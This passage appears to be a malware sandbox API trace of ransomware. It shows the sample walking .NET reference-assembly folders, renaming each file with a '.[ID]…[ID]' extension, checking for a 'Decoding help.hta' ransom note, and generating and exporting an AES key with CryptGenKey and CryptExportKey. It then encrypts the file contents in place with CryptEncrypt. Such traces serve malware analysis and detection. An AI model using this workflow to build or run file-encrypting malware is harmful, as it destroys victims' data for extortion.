Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationClientsideProviders.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" [0056.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" [0056.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.729] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a98c6a0, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9a98c6a0, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5d106003, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationProvider.dll", cAlternateFileName="")) returned 1 [0056.729] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.730] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationProvider.dll") returned -1 [0056.730] lstrlenW (lpString="UIAutomationProvider.dll") returned 24 [0056.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationProvider.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" [0056.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" [0056.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.730] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa4ad71, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9aa4ad71, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5d17841d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationTypes.dll", cAlternateFileName="")) returned 1 [0056.730] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.730] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationTypes.dll") returned -1 [0056.730] lstrlenW (lpString="UIAutomationTypes.dll") returned 21 [0056.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.730] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationTypes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" [0056.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" [0056.731] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.731] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa97d2889, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa97d2889, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa97f89ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x110000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsBase.dll", cAlternateFileName="")) returned 1 [0056.731] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.731] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.731] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WindowsBase.dll") returned -1 [0056.731] lstrlenW (lpString="WindowsBase.dll") returned 15 [0056.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.731] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WindowsBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" [0056.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" [0056.731] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.731] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acf85fb, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x9acf85fb, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5d2a8f0d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsFormsIntegration.dll", cAlternateFileName="")) returned 1 [0056.732] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.732] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.732] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WindowsFormsIntegration.dll") returned -1 [0056.732] lstrlenW (lpString="WindowsFormsIntegration.dll") returned 27 [0056.732] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.732] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.732] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WindowsFormsIntegration.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" [0056.732] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" [0056.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.732] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.733] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x803d8e97, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinFXList.xml", cAlternateFileName="WINFXL~1.XML")) returned 1 [0056.733] lstrcpyW (in: lpString1=0x10c86800, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.733] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.733] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.734] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinFXList.xml") returned -1 [0056.734] lstrlenW (lpString="WinFXList.xml") returned 13 [0056.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.734] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.734] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WinFXList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" [0056.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" [0056.734] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0056.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0058.256] CreateFileMappingA (hFile=0x5fc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa40 [0058.256] CryptAcquireContextA (in: phProv=0xfd8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xfd8fcec*=0x344a128) returned 1 [0060.190] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0xfd8fce8 | out: phKey=0xfd8fce8*=0x42cf518) returned 1 [0060.190] CryptExportKey (in: hKey=0x42cf518, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xfd8fbe4, pdwDataLen=0xfd8fce4 | out: pbData=0xfd8fbe4*, pdwDataLen=0xfd8fce4*=0x2c) returned 1 [0060.190] MapViewOfFile (hFileMappingObject=0xa40, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa00) returned 0x4530000 [0063.688] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfd8fbe4*, pdwDataLen=0xfd8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xfd8fbe4*, pdwDataLen=0xfd8fcf8*=0x100) returned 1 [0063.690] CryptEncrypt (in: hKey=0x42cf518, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4530000*, pdwDataLen=0xfd8fce4*=0xa00, dwBufLen=0xa00 | out: pbData=0x4530000*, pdwDataLen=0xfd8fce4*=0xa00) returned 1 [0063.691] UnmapViewOfFile (lpBaseAddress=0x4530000) Thread: id = 560 os_tid = 0xd04 [0048.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*", lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x96e4e65d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x96e4e65d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cb0 [0051.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.587] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x96e4e65d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x96e4e65d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.280] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0052.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.281] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1efbd239, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x1efbd239, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5ce0c4ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Conversion.v3.5.dll", cAlternateFileName="")) returned 1 [0052.281] lstrcpyW (in: lpString1=0x114850b8, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0052.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0052.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference 